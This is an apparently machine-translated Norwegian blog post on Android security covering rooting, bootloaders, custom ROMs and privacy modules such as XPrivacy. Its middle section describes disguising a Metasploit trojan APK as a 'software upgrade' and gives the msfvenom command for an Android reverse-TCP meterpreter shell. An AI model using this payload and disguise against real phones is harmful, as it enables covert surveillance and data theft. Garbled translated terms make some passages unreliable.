Bildekilde: pixabay.com

Introduksjon til Android

I dette emnet skal vi lære om Android og Open Source Security (OS). Android er en Open Source-plattform. Det er mye som Linux, men fremdeles altfor forskjellig fra Linux. Linux er altfor modnet sammenlignet med Android. Så dette er Chetan Nayak, og velkommen til min neste blogg om Open Source Web Security. Jeg har skrevet denne bloggen forutsatt at de fleste av oss ville bruke Android K, dvs. Kitkat eller Android L dvs. Lollipop.

Årsaken til at Pepperkaker og Jellybean hadde mange sikkerhetsproblemer med åpen kildekode som jeg ikke kan diskutere i denne eneste bloggen. Så kanskje jeg vil diskutere det neste gang når jeg går dypere inn i de eldre versjonene av Android. Så nå, la oss holde oss til KitKat og Lollipop.

Android ble designet med tanke på utviklere. Sikkerhetskontroller ble designet for å redusere belastningen for utviklere. Sikkerhetsutviklede utviklere kan enkelt jobbe med og stole på fleksible sikkerhetskontroller. Utviklere som er mindre kjent med sikkerhet, vil bli beskyttet av sikre standarder.

Begynnelsen

Jeg var ikke så mye i android før senere kvartal 2013 da jeg hadde min første Android-mobiltelefon som var Sony Xperia L (basert på 4.2.2 fra da). Pokker, jeg hatet Android også fordi det var ekstremt laggy, spesielt Samsung-enheter. Jeg vurderte til og med å kjøpe en Windows Lumia den gang, men heldigvis spilte jeg mye spill, og jeg måtte kjøpe Xperia L siden denne cellen var Lag Proof. Den hadde omtrent 1 gig RAM og Adreno 305. Kul nok til å kjøre noe.

Etter å ha spilt mange spill som NOVA3 og ModernCombat4, ble jeg lei av den cellen i løpet av en måned. Jeg visste at Android var basert på Linux, og jeg ønsket å gjøre noen av endringene mine på det. Jeg begynte å lese om tilpasninger og lærte om det som ble kalt "Rooting". Siden jeg hadde en god backhand i Linux, var ikke rooting noe problem med meg. Med litt hjelp fra XDA klarte jeg å rote cellen min.

Men så slo noe meg. Så snart cellen min startet på nytt etter rooting, startet den bare oppstart-looping (fast på startskjermen for alltid). Jeg visste ikke engang hva bootloader var i android. Så det var ingenting jeg kunne gjøre. Det var bare en måned etter at jeg kjøpte den nye cellen min, og cellen var nå myk. Jeg har alltid lest at rooting er farlig, men jeg visste ikke at det ville tegne cellen min. Men jeg tok feil. Mens jeg fortsatte å lese en og annen ting om forankring, ble jeg kjent med at rooting ikke murer telefonen din.

Rooting ligner bare på og Admin Access på en datamaskin (Egentlig er det systemtilgang, men jeg skrev Admin Access, så det er lett å forstå for noobs.). Dette betyr at forankring aldri vil miste telefonen din. Det var bootloader som muret telefonen min. For folk som ikke vet at bootloader er; bootloader ligner BIOS i windows. (Hvis du ikke vet hva BIOS er, bør du ikke en gang lese tankene om sikkerhet i utgangspunktet.) Bootloader eller Hboot (det er det det heter i android) er det første som kjører når du starter opp Android-en enhet.

Den pakker instruksjonene for å starte opp operativsystemkjernen, og de fleste av dem er spesielt designet for å kjøre sitt eget feilsøkings- eller modifikasjonsmiljø.

Sikkerhetssjekkpunktet til Android

Tenk på bootloader som sikkerhetskontrollpunktet på enheten din. Hvis du bryter dette sjekkpunktet, vil du miste alt du har på telefonen. Så det er en god sikkerhetsfunksjon sier jeg. For hvis du mister telefonen din, og noen prøver å få rottilgang for å omgå låsen (forutsatt at du har låst enheten din med en pinne eller passord.), Vil han tvangsfritt måtte låse opp bootloaderen, noe som vil resultere i å slette dataene dine på telefonen.

Så du trenger ikke å bekymre deg for at noen misbruker det. Så likt er tilfellet med tilpassede ROM-er. ROM-er er operativsystemer basert på Android-versjoner som er spesielt designet for maskinvarearkitekturen. Så hvis du sjekker XDA for telefonen din, vil du ha et antall tilpassede ROM-er til dine telefoner, noen av de mest kjente er Cyanogen Mod ROM-er, som allerede er forankret og har et forhåndsdefinert sett med tilpasninger. .

Sikkerhetsoverskridelsen av Android

Du tenker kanskje på nå, at du har en sikker mobiltelefon. Men jeg er her for å bevise at du tar feil igjen, og det er hele poenget med denne bloggen. I løpet av andre kvartal 2014 hadde folk allerede begynt å utvikle exploits og rootkits for Android, noe som kunne rote mobiltelefonene dine uten en gang å låse opp bootloaders.

Ikke skummelt nok? La meg fortelle deg den farligste delen. De kunne til og med installere trojanere inni det. Så selv om politiet kan spore cellen og du til og med får tilbake cellen, er det fortsatt stor risiko for at de kan se alt du gjør på telefonen. Dette er noe jeg har prøvd som et eksperiment i et faktisk praktisk miljø.

Jeg brukte Metasploit for dette angrepet. Det jeg gjorde var at jeg opprettet en Trojan og installerte den i måltelefonen. Det var en enkel apk-fil, og jeg kalte den en programvareoppgradering. Så hvis brukeren bare er en vanlig mann med bare bit og byte med informasjon om sikkerhet, vil han ikke engang tør å fjerne den. Og jeg sørget for at når internett aktiveres, skadelig programvare jeg opprettet automatisk kjøres og kobles tilbake til min eksterne port på vertsmaskinen.

Følgende kommandoer ble brukt for angrepet (Metasploit er en programvare for penetrasjonstesting som hjelper med å sjekke sårbarheter på en plattform eller spesifikke enheter.)

IP-adressen min: 192.168.xx.xx

Min vertsport (for å koble tilbake til): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Så her opprettet jeg en omvendt TCP-kanal på datamaskinen min. Så hver gang internett starter på android, vil jeg få et skall åpnet på Kali-maskinen min eller på maskinen der jeg har installert Metasploit.

Så nå vet du hvor skummelt det er for en person som du ikke en gang kjenner, har poster over hver transaksjon du gjør gjennom mobilen din, annenhver kontakt, WhatsApp-meldinger, SMS, Viber og Skype-samtalelogg og alt. Hvis det ikke er skummelt, så vet jeg ikke hva det er.

Anbefalte kurs

  • Sertifiseringskurs i rubin debugging
  • Fullfør PHP MySQL-kurs
  • Online sertifiseringskurs i VB.NET-programmering
  • Nettkurs om ITIL Foundation

Dekningen

Nok om sikkerhetsspørsmål. Vi vet alle at annenhver plattform har sikkerhetsproblemer. Hvordan kunne vi være sikre da? Dette stemmer ikke helt. Plattformer kan sikres opp til et bestemt punkt, men etter det er det opp til oss å sørge for at det holder seg slik. Det er et beryktet sitat i sikkerhetsverdenen:

“Samfunnsteknikk: Fordi det ikke er noen oppdatering for menneskelig dumhet”

Jeg hørte denne frasen for lenge siden da jeg så på en konferanse med DefCon.

Når det ikke er noen teknisk sårbarhet å utnytte, bør du prøve å hacke mennesker. Og med det mener jeg ikke hypnotisme og sånt. Jeg mener samfunnsingeniør. Du kan lese den andre bloggen min "Viktigheten av cybersikkerhet i vårt daglige liv" for mer info om dette.

Kjernesikkerhetsfunksjon til Android

Dessuten sosialteknikk, som er noe som bare kan tas vare på hvis du er smart; det er måter hvordan du kan utvikle Android-applikasjoner på en sikker måte for å sikre at det holder seg slik.

Så her er noen av de viktigste sikkerhetsfunksjonene som hjelper deg å bygge sikre apper:

  • Android-applikasjonen Sandbox, som isolerer appdataene dine og kodeutførelsen fra andre apper.
  • Et applikasjonsrammeverk med robuste implementeringer av vanlig sikkerhetsfunksjonalitet som kryptografi, tillatelser og sikker IPC.
  • Et kryptert filsystem som kan aktiveres for å beskytte data på tapte eller stjålne enheter.
  • Brukergitte tillatelser for å begrense tilgangen til systemfunksjoner og brukerdata.
  • Applikasjonsdefinerte tillatelser til å kontrollere applikasjonsdata per app-basis.

Hva kan du gjøre hvis du vil ha et sikkert miljø, men ikke er en utvikler?

Fra Android 5, dvs. Lollipop, gir den en funksjon der brukeren kan legge til flere profiler og begrensede modus for å bruke telefoner og nettbrett. Dessuten, hvis du har forankret telefonen din, er det Android-apper i Xposed-moduler som AppOps, Xprivacy eller Privacy Guard som kan hjelpe deg med å ta vare på nesten alt. Du må installere Xposed Framework for det.

Xposed Framework er det som lar Xposed-moduler fungere. Xposed moduler lar deg endre oppførselen til Apk filer og systemfiler uten å måtte installere en annen ROM. Det er også enkelt å angre endringene, så det er liten fare her, og det er ikke engang tidkrevende siden det ikke er behov for å blinke flere ROMS, kjerner og feilrettinger deres.

Xprivacy, Privacy Guard og AppOps er moduler av utsatte som lar deg sikre din Android ved å velge hvilken app som skal ha tilgang til hva som internett, tastatur, sdcard, root-tilgang og mye annet. Du kan til og med deaktivere tilgang til bare spesifikke tjenester og opprette brukerdefinerte maler for det. Når det gjelder meg, velger jeg helst Xprivacy. Men her er litt info eller forskjeller hvis du ber om å avvike for å velge mellom de tre ovenfor.

AppOps:

Dette ble opprinnelig introdusert av Google i Android 4.3. (Dette er hovedgrunnen til at jeg ikke støtter det. Jeg stoler ikke på Google. Kall det Paranoia, men google sporer alt du gjør. Og jeg trenger ikke noen som holder rede på alt jeg gjør, men hvis du stoler på Google, gå for det.). Den viktigste begrensningen av AppOps er at Google bare lar deg blokkere tilgang til appene som den vil at du skal blokkere.

Det betyr at hvis du vil sperre apper relatert til Google, for eksempel Play Services (som faktisk bruker mer enn 50% av ditt normale minne, batteri og data (internett)), vil du ikke kunne. Dette er enda en grunn til at jeg hater Google. Så jeg tror at AppOps ikke er noe annet enn en malware for meg. (men det er bare jeg som tenker på den måten, det er ikke hvis du stoler på Google alene)

Personvernvakt:

Privacy Guard er et enkelt å bruke grensesnitt laget for å erstatte AppOps av Cyanogen Mod. Hvis du er nybegynner, så foreslår jeg at du bruker dette, siden det bare har en av / på-knapp og selvdefinerte maler for hvilken type app som skal ha tilgang til hva. Dette er ikke så sikkert hvis det er en malware som opptrer eller utgir seg som en systemapp. Men det er bra å komme i gang.

Xprivacy:

Xprivacy er et Alt i ett verktøy. Men det er rettet mot eksperter. Du kan sammenligne den med en sveitsisk hærkniv. Den har alt i seg og kan gjøre telefonen din sikker på annenhver måte, men hvis du ikke vet hva du gjør, vil den bare rote telefonen din og forhindre at apper til og med starter. Du kan også begrense tilgangen til systemapper. Dette er det jeg personlig foretrekker å velge.

I tillegg til modulene ovenfor, er det til og med andre moduler som Lightening Firewall eller BootManager i Xposed, noe som kan bidra til å begrense tilgangen til internett for bestemte apper og stoppe apper fra å starte opp ved siden av systemet når du starter en telefon på nytt.

Så det ville være det for denne bloggen. I tilfelle av sikkerhetshensyn kan du sikkert besøke eller være medlem av XDAs nettsted, noe som kan gi deg mye mer informasjon om personvern.

Anbefalte artikler: -

Dette har vært en guide til Android. Her diskuterte vi Basic Concept, Security checkpoints and Core Security Function of Android. Du kan også gå gjennom andre foreslåtte artikler for å lære mer -

  1. Spørsmål om Android-intervju - Topp 10 nyttige spørsmål
  2. 8 nyttige Siri-alternativer for Android
  3. 28 beste tips og triks for utviklingsverktøy for Android-apper
  4. Karrierer innen Android-utvikling